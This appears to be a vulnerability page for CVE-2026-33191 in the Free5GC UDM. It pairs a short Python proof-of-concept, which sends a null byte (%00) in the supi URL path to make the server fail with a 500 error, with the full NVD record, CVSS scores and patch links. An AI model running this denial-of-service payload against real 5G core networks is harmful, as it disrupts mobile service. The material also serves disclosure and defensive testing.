CVE-2026-33191

#!/usr/bin/env python3 import requests def exploit_cve_2026_33191(target_ip): """ PoC for CVE-2026-33191: Null Byte Injection in Free5GC UDM. This script sends a request with a null byte (%00) in the supi parameter to trigger a URL parsing error and cause a 500 Internal Server Error. """ # The vulnerable endpoint typically involves the supi (Subscription Permanent Identifier) # Construct the malicious URL with a null byte malicious_url = f"http://{target_ip}/nudm-subscriberdata-management/v1/subscription-data/%00" try: print(f"[*] Sending payload to {malicious_url}") response = requests.get(malicious_url, timeout=10) if response.status_code == 500: print("[+] Exploit successful! Server returned 500 Internal Server Error.") print(f"[+] Response body: {response.text[:200]}") else: print(f"[-] Unexpected status code: {response.status_code}") print(f"[-] Response body: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": # Replace with the actual target IP address or hostname target = "<TARGET_IP>:<PORT>" exploit_cve_2026_33191(target)

{"cve": {"id": "CVE-2026-33191", "sourceIdentifier": "[email protected]", "published": "2026-03-20T08:16:12.597", "lastModified": "2026-03-23T18:24:15.897", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Free5GC is an open-source Linux Foundation project for 5th generation (5G) mobile core networks. Versions prior to 1.4.2\nare vulnerable to null byte injection in URL path parameters. A remote attacker can inject null bytes (URL-encoded as %00) into the supi path parameter of the UDM's Nudm_SubscriberDataManagement API. This causes URL parsing failure in Go's net/url package with the error \"invalid control character in URL\", resulting in a 500 Internal Server Error. This null byte injection vulnerability can be exploited for denial of service attacks. When the supi parameter contains null characters, the UDM attempts to construct a URL for UDR that includes these control characters. Go's URL parser rejects them, causing the request to fail with 500 instead of properly validating input and returning 400 Bad Request. This issue has been fixed in version 1.4.2."}, {"lang": "es", "value": "Free5GC es un proyecto de código abierto de la Linux Foundation para redes centrales móviles de quinta generación (5G). Las versiones anteriores a la 1.4.2 son vulnerables a la inyección de bytes nulos en los parámetros de ruta de URL. Un atacante remoto puede inyectar bytes nulos (codificados en URL como %00) en el parámetro de ruta supi de la API Nudm_SubscriberDataManagement del UDM. Esto causa un fallo en el análisis de URL en el paquete net/url de Go con el error 'invalid control character in URL', lo que resulta en un error 500 Internal Server Error. Esta vulnerabilidad de inyección de bytes nulos puede ser explotada para ataques de denegación de servicio. Cuando el parámetro supi contiene caracteres nulos, el UDM intenta construir una URL para UDR que incluye estos caracteres de control. El analizador de URL de Go los rechaza, lo que provoca que la solicitud falle con 500 en lugar de validar correctamente la entrada y devolver 400 Bad Request. Este problema ha sido solucionado en la versión 1.4.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-158"}, {"lang": "en", "value": "CWE-248"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:udm:*:*:*:*:*:go:*:*", "versionEndExcluding": "1.4.2", "matchCriteriaId": "C4C4212B-95F4-49DD-B6DA-F6DF4D8D7257"}]}]}], "references": [{"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-p9hg-pq3q-v9gv", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/free5gc/udm/commit/88de9fa74a1b3f3522e53b4cfa2d184712ffa4ee", "source": "[email protected]", "tags": ["Patch"]}]}}